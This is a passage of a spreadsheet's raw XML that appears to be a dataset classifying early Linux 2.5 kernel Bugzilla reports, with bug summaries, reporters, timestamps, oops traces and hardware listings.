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6" rupBuild="19001"/>
  <workbookPr filterPrivacy="1"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12650" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="classified" sheetId="5" r:id="rId1"/>
    <sheet name="features request" sheetId="8" r:id="rId2"/>
    <sheet name="compile-time issures" sheetId="6" r:id="rId3"/>
    <sheet name="documentation issues" sheetId="7" r:id="rId4"/>
    <sheet name="operator errors" sheetId="9" r:id="rId5"/>
    <sheet name="other issues" sheetId="10" r:id="rId6"/>
    <sheet name="duplicates" sheetId="11" r:id="rId7"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">classified!$A$1:$Y$4379</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'compile-time issures'!$A$1:$Q$548</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'documentation issues'!$A$1:$T$129</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">duplicates!$A$1:$P$47</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'features request'!$A$1:$S$351</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'operator errors'!$A$1:$P$69</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'other issues'!$A$1:$S$225</definedName>
    <definedName name="_xlnm.Criteria" localSheetId="0">classified!$A$2:$A$4</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23" i="10" l="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="113494" uniqueCount="31607">
  <si>
    <t>id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>summary</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>status</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>product</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>component</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>hardware</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>importance</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>tree</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>reported time</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>reporter</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>modified time</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>comments number</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>description</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IO/Storage</t>
  </si>
  <si>
    <t>IDE</t>
  </si>
  <si>
    <t>IA-32 Linux</t>
  </si>
  <si>
    <t>P2 normal</t>
  </si>
  <si>
    <t>Mainline</t>
  </si>
  <si>
    <t>Thomas Molina</t>
  </si>
  <si>
    <t>Martin J. Bligh</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>CLOSED CODE_FIX</t>
  </si>
  <si>
    <t>Platform Specific/Hardware</t>
  </si>
  <si>
    <t>i386</t>
  </si>
  <si>
    <t>2003-01-05 11:28 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.46 Distribution: debian woody Harware Environment: 16-way NUMA-Q Problem Description: Hangs during TSC initialization on boot. There's a garbled panic during IO-APIC init, then hang during TSC sync</t>
  </si>
  <si>
    <t>Enabling shared pagetables causes KDE to wierd out</t>
  </si>
  <si>
    <t>Memory Management</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>2002-11-13 18:55 UTC</t>
  </si>
  <si>
    <t>2003-01-05 11:29 UTC</t>
  </si>
  <si>
    <t>Dave McCracken</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.46-mm1 Distribution: Redhat 7.2 / 7.3 Hardware Environment: P4 PC Software Environment: KDE Problem Description: Enabling shared pagetables causes KDE to wierd out Steps to reproduce: Start KDE</t>
  </si>
  <si>
    <t>P2 blocking</t>
  </si>
  <si>
    <t>file lock accounting broken</t>
  </si>
  <si>
    <t>File System</t>
  </si>
  <si>
    <t>VFS</t>
  </si>
  <si>
    <t>All Linux</t>
  </si>
  <si>
    <t>2002-11-14 04:48 UTC</t>
  </si>
  <si>
    <t>Matthew Wilcox</t>
  </si>
  <si>
    <t>2003-04-03 06:18 UTC</t>
  </si>
  <si>
    <t>Problem Description: the file locking code accounting is done per-task and tasks can free each others locks causing the accounting to get broken. Steps to reproduce: someone sent me a test program... i'll attach it later.</t>
  </si>
  <si>
    <t>EHCI not properly shut down on reboot, kills usb keyboard in bios/bootloader</t>
  </si>
  <si>
    <t>Drivers</t>
  </si>
  <si>
    <t>USB</t>
  </si>
  <si>
    <t>2002-11-14 08:51 UTC</t>
  </si>
  <si>
    <t>Nicolas Mailhot</t>
  </si>
  <si>
    <t>2003-03-06 15:25 UTC</t>
  </si>
  <si>
    <t>David Brownell</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.46-bk2 (and other from 2.5.44 to 2.5.47, don't remember all the verions tested) Distribution: Red Hat Rawhide Hardware Environment: Gigabyte GA -7VAX, latest bios, keyboard + mouse on external usb2 nec hub Problem Description: When I enable ehci, boot into 2.5 then reboot I loose the usb input. Since my input is 100% usb, this is real anoying in the bootloader and bios settings (i.e. I need usb input that can be handled by the bios) uhci works in 2.4 and 2.5 ehci works in w2k The workaround is to manually turn off the psu to reset the system</t>
  </si>
  <si>
    <t>USB HCs may have improper interrupt configuration with ACPI in IOAPIC mode</t>
  </si>
  <si>
    <t>ACPI</t>
  </si>
  <si>
    <t>Config-Interrupts</t>
  </si>
  <si>
    <t>P2 high</t>
  </si>
  <si>
    <t>2.5.46-bk2 to 2.6.0-test4-bk2</t>
  </si>
  <si>
    <t>2002-11-14 08:56 UTC</t>
  </si>
  <si>
    <t>2004-03-03 14:40 UTC</t>
  </si>
  <si>
    <t>Len Brown</t>
  </si>
  <si>
    <t>70 955 969</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.46-bk2 Distribution: Red Hat Rawhide Hardware Environment: Gigabyte GA -7VAX, latest bios I'm trying to move from an pure usb hid + acpi + io-apic UP 2.4 system to a 2.5 one. Hardware is via kt400 based. The problem is : * 2.5 io-apic kills usb input device not accepting address", see http://linux-usb.sourceforge.net/FAQ.html#ts6 * without io-apic build-in rt8139too do not work with acpi : nov 5 20:50:30 rousalka ifup: nov 5 20:50:30 rousalka ifup: D</t>
  </si>
  <si>
    <t>Intermezzo Compile Failure</t>
  </si>
  <si>
    <t>2002-11-14 09:09 UTC</t>
  </si>
  <si>
    <t>Adam Voigt</t>
  </si>
  <si>
    <t>2002-12-25 19:34 UTC</t>
  </si>
  <si>
    <t>Vortex init is too chatty</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>P2 low</t>
  </si>
  <si>
    <t>2002-11-14 09:16 UTC</t>
  </si>
  <si>
    <t>Burton Windle</t>
  </si>
  <si>
    <t>2003-01-05 13:05 UTC</t>
  </si>
  <si>
    <t>Jeff Garzik</t>
  </si>
  <si>
    <t>Please enter Exact Kernel version: 2.5.47, plus many older 2.5 kernels Distribution: Debian Testing Hardware Environment: single i386, 3c59x PCI NIC Software Environment: Problem Description: When my 3c59x NIC initializes, it printks a lot of debugging info. 3c59x: Donald Becker and others. www.scyld.com/network/vortex.html 00:13.0: 3Com PCI 3c590 Vortex 10Mbps at 0xff80. Vers LK1.1.17 00:13.0: Overriding PCI latency timer (CFLT) setting of 64, new value is 248. phy=0, phyx=24, mii_status=0xffff phy=1, phyx=0, mii_status=0xffff phy=2, phyx=1, mii_status=0xffff phy=3, phyx=2, mii_status=0xffff phy=4, phyx=3, mii_status=0xffff phy=5, phyx=4, mii_status=0xffff phy=6, phyx=5, mii_status=0xffff phy=7, phyx=6, mii_status=0xffff phy=8, phyx=7, mii_status=0xffff phy=9, phyx=8, mii_status=0xffff phy=10, phyx=9, mii_status=0xffff phy=11, phyx=10, mii_status=0xffff phy=12, phyx=11, mii_status=0xffff phy=13, phyx=12, mii_status=0xffff phy=14, phyx=13, mii_status=0xffff phy=15, phyx=14, mii_status=0xffff phy=16, phyx=15, mii_status=0xffff phy=17, phyx=16, mii_status=0xffff phy=18, phyx=17, mii_status=0xffff phy=19, phyx=18, mii_status=0xffff phy=20, phyx=19, mii_status=0xffff phy=21, phyx=20, mii_status=0xffff phy=22, phyx=21, mii_status=0xffff phy=23, phyx=22, mii_status=0xffff phy=24, phyx=23, mii_status=0xffff phy=25, phyx=25, mii_status=0xffff phy=26, phyx=26, mii_status=0xffff phy=27, phyx=27, mii_status=0xffff phy=28, phyx=28, mii_status=0xffff phy=29, phyx=29, mii_status=0xffff phy=30, phyx=30, mii_status=0xffff phy=31, phyx=31, mii_status=0xffff ***WARNING*** No MII transceivers found! NET4: Linux TCP/IP 1.0 for NET4.0 Steps to reproduce: Boot a kernel &gt; 2.5.4#, with 3c59x (VORTEX) built in. Fix: remove a few printks :)</t>
  </si>
  <si>
    <t>user-mode-linux (ARCH=um) compile broken in 2.5.47</t>
  </si>
  <si>
    <t>UML</t>
  </si>
  <si>
    <t>Other Linux</t>
  </si>
  <si>
    <t>2002-11-14 11:01 UTC</t>
  </si>
  <si>
    <t>Roland Dreier</t>
  </si>
  <si>
    <t>2003-03-17 15:37 UTC</t>
  </si>
  <si>
    <t>Jeff Dike</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47 User-mode-linux (ARCH=um) will not compile in 2.5.47. I ran into a number of problems: 1. Make dependencies are wrong, so that the build tries to use directories and includes before it creates them. For example the build will fail because include/asm/arch doesn't get created in time. 2. arch/um/Makefile needs to define LDFLAGS_BLOB for so that the initramfs stuff works. 3. the declaration of sys_write() in initramfs.c conflicts with UML's declaration. There are probably more problems, I gave up trying to fix things because I was afraid of breaking stuff (I don't understand the UML build process well enough)</t>
  </si>
  <si>
    <t>No dri : unsupported Via chipset (device id: 3189)</t>
  </si>
  <si>
    <t>Video(AGP)</t>
  </si>
  <si>
    <t>2002-11-14 12:11 UTC</t>
  </si>
  <si>
    <t>2010-02-04 19:34 UTC</t>
  </si>
  <si>
    <t>Dave Jones</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47-ac1 Kernel command line: ro root=/dev/hdc1 agp_try_unsupported=1 video=matrox:vesa:0x11B,fh:96,fv:160 Distribution: Red Hat Rawhide Hardware Environment: Gigabyte GA -7VAX http://www.giga-byte.com/products/7vax.htm Northbridge : VIA KT400 Southbridge : VIA 8235 latest bios + mga G400 On boot : Linux agpgart interface v0.99 (c) Jeff Hartmann agpgart: Maximum main memory to use for agp memory: 439M agpgart: Unsupported Via chipset (device id: 3189), you might want to try agp_try_unsupported=1. agpgart: no supported devices found. [drm:drm_init] *ERROR* Cannot initialize the agpgart module. Uninitialised timer! This is just a warning. Your computer is OK function=0x00000000, data=0x0 Call Trace: [&lt;c0122ce4&gt;] check_timer_failed+0x64/0x70 [&lt;c0122fe1&gt;] del_timer+0x21/0x90 [&lt;c01e0e20&gt;] mga_takedown+0x60/0x380 [&lt;c01e58e2&gt;] mga_stub_unregister+0x32/0x11d [&lt;c010508d&gt;] init+0x3d/0x160 [&lt;c0105050&gt;] init+0x0/0x160 [&lt;c0107435&gt;] kernel_thread_helper+0x5/0x10</t>
  </si>
  <si>
    <t>reproduceable oops in lock_get_status</t>
  </si>
  <si>
    <t>2002-11-14 12:28 UTC</t>
  </si>
  <si>
    <t>2003-03-07 20:13 UTC</t>
  </si>
  <si>
    <t>Please enter Exact Kernel version: 2.5.47, but many many older 2.5 kernels have same problem Distribution: Debian Testing Hardware Environment: single x86 CPU Software Environment: preempt enabled, non-SMP Problem Description: Reliable oops when reading /proc/locks. Unable to handle kernel NULL pointer dereference at virtual address 00000008 c014c08f *pde = 00000000 Oops: 0000 CPU: 0 EIP: 0060:[&lt;c014c08f&gt;] Not tainted Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00010286 eax: 00000000 ebx: c868f000 ecx: 00000001 edx: c8657f20 esi: c13c07ac edi: 00000000 ebp: 00000400 esp: c8657ee0 ds: 0068 es: 0068 ss: 0068 Stack: c8657f1c c13c07b0 c13c07ac c014c39c c868f000 c13c07ac 00000001 c0285593 c8656000 00000400 00000400 c868f000 c8657f1c c8657f20 00000001 c868f000 00000000 c015f65a c868f000 c8657f7c 00000000 00000400 00000000 00000400 Call Trace: [&lt;c014c39c&gt;] [&lt;c015f65a&gt;] [&lt;c015d378&gt;] [&lt;c0139c61&gt;] [&lt;c0139f32&gt;] [&lt;c01088f3&gt;] Code: 8b 78 08 8b 44 24 1c 50 8b 44 24 1c 50 68 ac 54 28 c0 53 e8 &gt;&gt;EIP; c014c08f &lt;lock_get_status+17/20c&gt; &lt;===== Trace; c014c39c &lt;get_locks_status+80/148&gt; Trace; c015f65a &lt;locks_read_proc+36/80&gt; Trace; c015d378 &lt;proc_file_read+ec/190&gt; Trace; c0139c61 &lt;vfs_read+c1/158&gt; Trace; c0139f32 &lt;sys_read+2a/3c&gt; Trace; c01088f3 &lt;syscall_call+7/b&gt; Code; c014c08f &lt;lock_get_status+17/20c&gt; 00000000 &lt;_EIP&gt;: Code; c014c08f &lt;lock_get_status+17/20c&gt; &lt;===== 0: 8b 78 08 mov 0x8(%eax),%edi &lt;===== Code; c014c092 &lt;lock_get_status+1a/20c&gt; 3: 8b 44 24 1c mov 0x1c(%esp,1),%eax Code; c014c096 &lt;lock_get_status+1e/20c&gt; 7: 50 push %eax Code; c014c097 &lt;lock_get_status+1f/20c&gt; 8: 8b 44 24 1c mov 0x1c(%esp,1),%eax Code; c014c09b &lt;lock_get_status+23/20c&gt; c: 50 push %eax Code; c014c09c &lt;lock_get_status+24/20c&gt; d: 68 ac 54 28 c0 push $0xc02854ac Code; c014c0a1 &lt;lock_get_status+29/20c&gt; 12: 53 push %ebx Code; c014c0a2 &lt;lock_get_status+2a/20c&gt; 13: e8 00 00 00 00 call 18 &lt;_EIP+0x18&gt; c014c0a7 &lt;lock_get_status+2f/20c&gt; Steps to reproduce: Debian Testing, with the ntop package installed. Run the ntop program as '/etc/init.d/ntop start', let it run for a few seconds, then do '/etc/init.d/ntop stop', then cat /proc/locks. It will give a non-fatal oops 100% of the time on two different Debian Testing machines. According to Matthew Wilcox: if (fl-&gt;fl_file != NULL) { if (fl-&gt;fl_file-&gt;f_dentry) { inode = fl-&gt;fl_file-&gt;f_dentry-&gt;d_inode; } else { printk(KERN_EMERG "null dentry at %d\n", id); } } That will avoid the oops, and tell us who managed to set a file lock on a file without a dentry.</t>
  </si>
  <si>
    <t>USB plug/unplug causes device_shutdown to loop forever on reboot</t>
  </si>
  <si>
    <t>2002-11-14 12:49 UTC</t>
  </si>
  <si>
    <t>2003-01-05 11:31 UTC</t>
  </si>
  <si>
    <t>Greg Kroah-Hartman</t>
  </si>
  <si>
    <t>Please enter Exact Kernel version: 2.5.47-bk2; problem started in 2.5.44, I think Distribution: Debian Testing Hardware Environment: 00:00.0 Host bridge: Intel Corp. 440LX/EX - 82443LX/EX Host bridge (rev 03) 00:01.0 PCI bridge: Intel Corp. 440LX/EX - 82443LX/EX AGP bridge (rev 03) 00:07.0 ISA bridge: Intel Corp. 82371AB/EB/MB PIIX4 ISA (rev 01) 00:07.1 IDE interface: Intel Corp. 82371AB/EB/MB PIIX4 IDE (rev 01) 00:07.2 USB Controller: Intel Corp. 82371AB/EB/MB PIIX4 USB (rev 01) 00:07.3 Bridge: Intel Corp. 82371AB/EB/MB PIIX4 ACPI (rev 01) 00:0f.0 PCI bridge: Digital Equipment Corporation DECchip 21152 (rev 03) 01:00.0 VGA compatible controller: ATI Technologies Inc 3D Rage Pro AGP 1X (rev c) 02:0a.0 Ethernet controller: 3Com Corporation 3c590 10BaseT [Vortex] 02:0b.0 Ethernet controller: Accton Technology Corporation SMC2-1211TX (rev 10) USB device: drivers/usb/core/hub.c: new USB device 00:07.2-1, assigned address 2 input: USB HID v1.00 Mouse [Logitech] on usb-00:07.2-1 Software Environment: Debian Testing. Problem Description: If I boot a 2.5.47-bk2 kernel, and do not remove/add USB devices, I can reboot fine. If I boot a 2.5.47-bk2 kernel, and remove and then replug in a USB device, a later reboot will hang in device_shutdown (as show by sysrq+p). I have added printks to this function, and it appears to be looping forever in the 'for_each_device'. Steps to reproduce: Boot 2.5.47, or 2.5.44. Unplug USB mouse, then replug it, and reboot. Kernel will hang after init prints 'Rebooting...'. Sysrq+p shows it is stuck in device_shutdown.</t>
  </si>
  <si>
    <t>Synaptics touchpad driver</t>
  </si>
  <si>
    <t>Input Devices</t>
  </si>
  <si>
    <t>2002-11-14 13:07 UTC</t>
  </si>
  <si>
    <t>Joseph Fannin</t>
  </si>
  <si>
    <t>2003-06-19 13:10 UTC</t>
  </si>
  <si>
    <t>Vojtech Pavlik</t>
  </si>
  <si>
    <t>With the new input system in 2.5, it isn't possible to modify settings for Synaptics touchpad hardware. This is the only thing keeping me from running 2.5 on my laptop -- I can't turn off the super-annoying "tap-to-click". Vojitech Pavlik indicated he would have to write a driver to make this possible, but there isn't one yet.</t>
  </si>
  <si>
    <t>aty128fb does not compile</t>
  </si>
  <si>
    <t>Console/Framebuffers</t>
  </si>
  <si>
    <t>2002-11-14 13:18 UTC</t>
  </si>
  <si>
    <t>Khoa Huynh</t>
  </si>
  <si>
    <t>The aty128fb ATI Rage 128 framebuffer driver doesn't compile in 2.5.47 because it has not been ported to the new fbdev API. These changes are in the linuxppc tree, but have not been merged into mainline.</t>
  </si>
  <si>
    <t>Kernel AGP support needs to be initialized sooner</t>
  </si>
  <si>
    <t>2002-11-14 13:25 UTC</t>
  </si>
  <si>
    <t>2002-12-17 15:53 UTC</t>
  </si>
  <si>
    <t>The kernel AGP drivers need to be initialized earlier in the boot process -- before the framebuffer system. This is needed for Antonio Daplas's framebuffer driver for the i810 video chipset which has no video memory of its own and must use the AGP GART to get linear memory for the framebuffer driver. Issues like this are why this driver is not merged yet. :-)</t>
  </si>
  <si>
    <t>Networking</t>
  </si>
  <si>
    <t>Paul Larson</t>
  </si>
  <si>
    <t>2003-06-27 08:25 UTC</t>
  </si>
  <si>
    <t>Bugme Janitors Team</t>
  </si>
  <si>
    <t>2002-11-14 13:48 UTC</t>
  </si>
  <si>
    <t>2003-03-06 12:21 UTC</t>
  </si>
  <si>
    <t>Alan</t>
  </si>
  <si>
    <t>No sound on TOSLINK output with CS4624 and alsa</t>
  </si>
  <si>
    <t>2002-11-14 14:01 UTC</t>
  </si>
  <si>
    <t>2003-01-05 11:34 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47-ac3 Distribution: Red Hat Raw Hide Hardware Environment: Gigabyte GA -7VAX http://www.giga-byte.com/products/7vax.htm Hercules Fortissimo III 7.1 http://europe.hercules.com/supportf.php?pa=mor&amp;drv=355&amp;prd=56&amp;ft=MANUALS&amp;os=26 [root@rousalka root]# /sbin/lspci -vv 00:00.0 Host bridge: VIA Technologies, Inc. VT8377 [KT400] Host Bridge Subsystem: Giga-byte Technology: Unknown device 5000 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 8 Region 0: Memory at d0000000 (32-bit, prefetchable) [size=128M] Capabilities: [a0] AGP version 2.0 Status: RQ=31 SBA+ 64bit- FW- Rate=x1,x2 Command: RQ=31 SBA- AGP- 64bit- FW- Rate=&lt;none&gt; Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:01.0 PCI bridge: VIA Technologies, Inc. VT8235 (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 Memory behind bridge: da000000-dcffffff Prefetchable memory behind bridge: d8000000-d9ffffff BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0a.0 Multimedia audio controller: Cirrus Logic CS 4614/22/24 [CrystalClear SoundFusion Audio Accelerator] (rev 01) Subsystem: Unknown device 1681:a011 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (1000ns min, 6000ns max) Interrupt: pin A routed to IRQ 11 Region 0: Memory at dd100000 (32-bit, non-prefetchable) [size=4K] Region 1: Memory at dd000000 (32-bit, non-prefetchable) [size=1M] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.0 USB Controller: VIA Technologies, Inc. USB (rev 80) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology: Unknown device 5004 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin A routed to IRQ 10 Region 4: I/O ports at d000 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.1 USB Controller: VIA Technologies, Inc. USB (rev 80) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology: Unknown device 5004 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin B routed to IRQ 7 Region 4: I/O ports at d400 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.2 USB Controller: VIA Technologies, Inc. USB (rev 80) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology: Unknown device 5004 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin C routed to IRQ 11 Region 4: I/O ports at d800 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) (prog-if 20 [EHCI]) Subsystem: Giga-byte Technology: Unknown device 5004 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin D routed to IRQ 12 Region 0: Memory at dd101000 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.0 ISA bridge: VIA Technologies, Inc. VT8233A ISA Bridge Subsystem: Giga-byte Technology: Unknown device 5001 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586B PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: Giga-byte Technology: Unknown device 5002 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Interrupt: pin A routed to IRQ 0 Region 4: I/O ports at dc00 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:13.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: Realtek Semiconductor Co., Ltd. RT8139 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (8000ns min, 16000ns max) Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at e000 [size=256] Region 1: Memory at dd102000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable+ DSel=0 DScale=0 PME- 01:00.0 VGA compatible controller: Matrox Graphics, Inc. MGA G400 AGP (rev 04) (prog-if 00 [VGA]) Subsystem: Matrox Graphics, Inc. Millennium G400 32Mb SGRAM Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (4000ns min, 8000ns max), cache line size 08 Interrupt: pin A routed to IRQ 10 Region 0: Memory at d8000000 (32-bit, prefetchable) [size=32M] Region 1: Memory at da000000 (32-bit, non-prefetchable) [size=16K] Region 2: Memory at db000000 (32-bit, non-prefetchable) [size=8M] Expansion ROM at &lt;unassigned&gt; [disabled] [size=64K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [f0] AGP version 2.0 Status: RQ=31 SBA+ 64bit- FW- Rate=x1,x2,x4 Command: RQ=31 SBA+ AGP+ 64bit- FW- Rate=x1 Software Environment: alsa environment apted from psyshe.freshrpms.net alsa-xmms-0.9.7-fr1 alsaplayer-0.99.72-fr2 alsa-lib-0.9.0rc5-fr1 gnome-alsamixer-0.1.2beta-fr1 Problem Description: Playing cd/mp3 in alsaplayer or xmms produces no sound, only put-put-put-put. Digital detect on external amp flickers</t>
  </si>
  <si>
    <t>NFS</t>
  </si>
  <si>
    <t>bugzilla notification bug</t>
  </si>
  <si>
    <t>Bug Tracker</t>
  </si>
  <si>
    <t>2002-11-14 15:28 UTC</t>
  </si>
  <si>
    <t>2002-11-22 11:51 UTC</t>
  </si>
  <si>
    <t>Jon Tollefson</t>
  </si>
  <si>
    <t>HotPlug</t>
  </si>
  <si>
    <t>SCSI</t>
  </si>
  <si>
    <t>Mike Anderson</t>
  </si>
  <si>
    <t>Compile time warnings from starfire driver (with PAE enabled)</t>
  </si>
  <si>
    <t>2002-11-14 16:29 UTC</t>
  </si>
  <si>
    <t>2003-02-12 09:58 UTC</t>
  </si>
  <si>
    <t>2.5.46 Crash at boot (kernel panic)</t>
  </si>
  <si>
    <t>2002-11-14 18:07 UTC</t>
  </si>
  <si>
    <t>Tibi</t>
  </si>
  <si>
    <t>2003-01-05 13:36 UTC</t>
  </si>
  <si>
